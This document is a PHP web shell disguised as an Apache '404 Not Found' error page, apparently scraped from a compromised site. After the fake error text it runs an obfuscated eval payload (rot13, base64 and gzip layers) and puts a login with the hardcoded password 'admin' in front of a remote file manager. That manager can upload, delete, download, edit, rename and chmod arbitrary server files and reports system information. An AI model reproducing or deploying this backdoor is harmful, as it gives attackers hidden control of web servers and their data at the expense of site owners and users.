Not Found

The requested URL '.$_SERVER['REQUEST_URI'].' was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

'; eval(gzuncompress(base64_decode(str_rot13('rWlqHJSYjmND/FgUXI4Y2mdMVTkHC0wSbrOpc19dPIy7p5H2vJaXAfG/ogcBHCMAFZwqr7y7YmyKDDurHqqxCWsS0sVyJvM4g1bgLxk9BQhQRkGPZNFHNa24Ogjnb2dRnE/uQAmTqaD+KsH1QLYCi9Kf7wSrLse1P15TG89EiTYCl7xyaOyfvcYLTkzJFJSVzAdewJnnIZxm8ckK4DmNfsi0Kh/Sdzd+T70IMghfz5e0xE9yfteBW5AYCK6/RZR4dUwEUtgenJG2Oa3sAhIyGDBjvfFeiiCrXgwZxWpp3jwuSoDk8Mk0ymx3ipoDUOEAtFgISux3uEGOsewo7LLodngub0fFzpjcg/nkVeBIrIrBeDr02ASdO7MFoA0HMp4+TgVUY0UMRJ6GJdrcKo4/t5/E3p4sbwwO9ypjGqOHvtyr2KtNW2ECqACAcQe8i1ecDuwNr5k9N53ghVj=')))); exit(); } if(isset($_POST['pass'])){ if($_POST['pass'] == "admin"){ $_SESSION['pass'] = $_POST['pass']; if($_SESSION['pass']){ mainCOde(); } }else{ login(); } }else{ if(isset($_SESSION['pass'])){ mainCOde(); }else{ login(); } } function mainCOde(){ echo ' '; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ $_SESSION['status'] = 'File Upload Done.
'; }else{ $_SESSION['status'] = 'Upload Error.
'; } } echo ''; if(isset($_POST['opt']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['opt_path'])){ $_SESSION['status'] = 'Delete Dir Done.
'; }else{ $_SESSION['status'] = 'Delete Dir Error.
'; } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['opt_path'])){ $_SESSION['status'] = 'Delete File Done.
'; }else{ $_SESSION['status'] = 'Delete File Error.
'; } } } if(isset($_POST['opt']) && $_POST['opt'] == 'download'){ if($_POST['type'] == 'file'){ ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=".basename($_POST['opt_path'])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['opt_path']); header("Content-Type: ".$type); } $fp = @fopen($_POST['opt_path'], "r"); if($fp) { while(!@feof($fp)) echo @fread($fp, 1024); fclose($fp); } } } if(isset($_SESSION['status'])){ echo ''; unset($_SESSION['status']); } if(isset($_POST['filesrc'])){ echo ""; echo '
Uname : '.php_uname().'
Current Path : '; if(isset($_POST['path'])){ $path = $_POST['path']; }else{ $path = getcwd(); } print "
"; echo '
Upload File :
Status : '.$_SESSION['status'].'
Current File : ".$_POST['filesrc']."

'; echo('
'); }elseif(isset($_POST['opt']) && $_POST['opt'] != 'delete'){ if(isset($_POST['opt']) && isset($_POST['src']) && $_POST['opt'] == 'edit' ){ $fp = fopen($_POST['opt_path'],'w'); if(fwrite($fp,$_POST['src'])){ $_SESSION['status'] = 'Edit File Done.
'; }else{ $_SESSION['status'] = 'Edit File Fail.
'; } fclose($fp); } if(isset($_POST['opt']) && isset($_POST['perm']) && $_POST['perm'] && $_POST['opt'] == 'chmod'){ $perms = 0; for($i=strlen($_POST['perm'])-1;$i>=0;--$i){ $perms += (int)$_POST['perm'][$i]*pow(8, (strlen($_POST['perm'])-$i-1)); } if(@chmod($_POST['opt_path'],$perms)){ $_SESSION['status'] = 'Change Permission Done.
'; }else{ $_SESSION['status'] = 'Change Permission Error.
'; } } $rename_status = false; if(isset($_POST['opt']) && isset($_POST['newname']) && $_POST['opt'] == 'rename'){ if(rename($_POST['opt_path'],$path.'/'.$_POST['newname'])){ $rename_status = true; $_SESSION['status'] = 'Change Name Done.
'; }else{ $_SESSION['status'] = 'Change Name Error.
'; } $_POST['name'] = $_POST['newname']; } echo "Current File : ".(isset($_POST['opt_path']) && $rename_status == false ? $_POST['opt_path'] : ( $rename_status == true ? $path.'/'.$_POST['newname'] : $_POST['opt_path'])).""; if(isset($_SESSION['status'])){ echo 'Status : '.$_SESSION['status'].''; unset($_SESSION['status']); } echo '
'; echo '
'; if($_POST['opt'] == 'chmod'){ echo '
Permission :
'; }elseif($_POST['opt'] == 'rename'){ echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ echo '

'; } echo '
'; }else{ echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo ""; } echo ''; foreach($scandir as $file){ if(!is_file("$path/$file")) continue; $size = filesize("$path/$file")/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } echo ""; } echo '
Name
Size
Permissions
Options
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo "
\" />
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo "
\" />
'; } echo ' '; } function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; }; ?>